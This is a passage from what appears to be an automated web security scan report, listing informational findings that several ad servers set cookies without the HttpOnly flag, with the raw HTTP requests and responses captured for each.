Date: Thu, 12 May 2011 13:33:33 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%.!!!?H!!!!%<wR0_!!%:p!!Du#=!>Ox!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#17U!!Du#=!>Ox!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; path=/; expires=Sat, 11-May-2013 13:33:33 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:33:33 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
9.18. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8201?d=24 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9waXhlbC5tYXRodGFnLmNvbS9kYXRhL2ltZz9tdF9pZD0xMDAxMzQmbXRfZGNpZD0yNCZ2MT0mdjI9JnYzPSZzMT0mczI9JnMzIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2JzdGF0cy5hZGJyaXRlLmNvbS9jbGljay9ic3RhdHMuZ2lmP2JhcGlkPTYzODgmdWlkPTc2ODkxMCZraWQ9NDMxMDU5OTkiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0yNCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL2EuY29sbGVjdGl2ZS1tZWRpYS5uZXQvZGF0YXBhaXI%2FbmV0PWV4JnNlZ3M9MTUmb3A9YWRkIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=97ff285f8e77e8edbb026a8559ac3e76
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnG5PfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; vsd=0@1@4dcbe0cc@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:33:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYIZ2ATTRk7wVYjdb0%2Fnf5PHiDFYPHG7B235RpLHgAs3GxOKSFLQqHHEwCsAFMRRPBcxjKXsNq9ZD3s3DY1YmlVKYhVcOoOTQyGLKSMEzm%2Fhy1PoubROv02DwpU8M9QcTneE53MnpqspWr70VR7tRN%2FqHiRi1vOfeknjflCpfX6W9Q%2FtPDpjwLtIELv1YaJg%2BPcTh7Tq9V%2B7FB45pFYFk6h4TQEsWOmVDwT1ZXOcLpoGchC8%2BnFErGMroprw0puXfB1vgF095J6SqH0HwktuxyES5Dxtf1yi0O6gD7y3l58byfxxBeostIiIEE1JWUraHxx8Hn8wU%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:33:36 GMT
Set-Cookie: vsd=0@1@4dcbe1b0@loadus.exelator.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:33:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
9.19. http://ads.adbrite.com/adserver/behavioral-data/8203  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8203

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/8203?d=2716 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjQ5NPGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; vsd=0@1@4dcbc6b1@cdn.turn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 13:31:36 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: ut="1%3AXZFJtoMgFET3wtgBoKgnu9HYoNII2ERD9h4gyT%2F4p9eqV1X4BBsGtyeY2mOXujHgBvTO%2BGqR4qYoLLIw8cB4MBdNAHdKy17BanOQ9Qu32NaJGQaRelUNg82icYJeK8iEydJ%2FPrVOi5tEqfTcHSlTzRxBxOlYPhxkdFRnm5TfoGDu5MX8o%2FxCDWsZc6RedmkLm9fpn1D8s%2FukPPO0gSuLJ9HZwXOkl51UxtBM6eJVXAkUdmZcup3zY1PulEbjln1ejUsRequmjMcM5FobG%2B3uzEcnhK0sQsuZmLLLub9FxkdcpMXeSmH%2FLYLwGlQTiQLy4h4HgATUlRCtHsLPBa%2FXGw%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 13:31:36 GMT
Set-Cookie: vsd=0@1@4dcbe138@bcp.crwdcntrl.net; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 13:31:36 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
9.20. http://ads.cpxadroit.com/adserver/10-3QKLX5UTS2G94.cpxad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cpxadroit.com
Path:   /adserver/10-3QKLX5UTS2G94.cpxad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/10-3QKLX5UTS2G94.cpxad HTTP/1.1
Host: ads.cpxadroit.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPX_3P=dlxdt=4/23/2011 12:50:05 AM; ALI20110512=2894-4-1776-120,2-5-841-63,8,2,1; PLI20110512=3392-4-1-8,8,2,1; SECPOP20110512=3392-3-1-72,8,2,1; CPX=IG=1&VID=fb257e86-0fa0-41bd-822b-b34cfbac2a55&LS=4TIMV11HXVYE6; CPXSEC=5JK3HOCEHD5=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&5JK3HWQEL6A=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00; CPX_IMP=6SQNB131HR1D7|5JK1IIZ8K16=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&66SRK4O488E00|5JK1J1PH6N1=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ALI20110512=2894-4-1776-120,2-5-841-63,8,2,1|72-4-99-10,2-5-458-36,9,31,1; expires=Fri, 13-May-2011 13:31:41 GMT; path=/
Set-Cookie: PLI20110512=3392-4-1-8,8,2,1|1748-4-2-26,9,31,1; expires=Fri, 13-May-2011 13:31:41 GMT; path=/
Set-Cookie: SECPOP20110512=3392-3-1-72,8,2,1|1748-3-1-105,9,31,1; expires=Fri, 13-May-2011 13:31:41 GMT; path=/
Set-Cookie: CPX=IG=1&VID=fb257e86-0fa0-41bd-822b-b34cfbac2a55&LS=4TIMVPPEC0PVC; expires=Sat, 12-May-2012 13:31:41 GMT; path=/
Set-Cookie: CPXSEC=5JK3HOCEHD5=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&5JK3HWQEL6A=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00&5JK3HQRHNI0=3QKLX5UTS2G94,3QKLX7TUXIXM4,5/12/2011 9:31:41 AM -04:00; expires=Sat, 11-Jun-2011 13:31:41 GMT; path=/
Set-Cookie: CPX_IMP=6SQNB131HR1D7|5JK1IIZ8K16=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&66SRK4O488E00|5JK1J1PH6N1=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00&5JJRUVK6XOQ6|5JK1IMRHNOC=3QKLX5UTS2G94,3QKLX7TUXIXM4,5/12/2011 9:31:41 AM -04:00; expires=Sat, 11-Jun-2011 13:31:41 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 12 May 2011 13:31:40 GMT
Content-Length: 2576

var popurlfull=true;var popped=false;var isChrome = navigator.userAgent.toLowerCase().indexOf("chrome") > -1;var win;function pop(){if (popped) return; popped=true;win = window.open ("http://ad.double
...[SNIP]...
9.21. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1245872D28820110329161145&pub=un15138&flash=10&time=4|8:31|-5&redir=http://ads.undertone.com/c?oaparams=2__bannerid=191501__campaignid=31210__zoneid=15138__UTLCA=1__cb=0868f0de93164900a3d4042d4f116630__bk=ll347o__id=6e71z3o27cnh1ioxqreihytn2__oadest=$CTURL$&r=0.510057557374239 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=14A30400-7732-07F8-1209-989000080200; PRca=|AKNx*1039:1|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKNxAAQl:1|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; 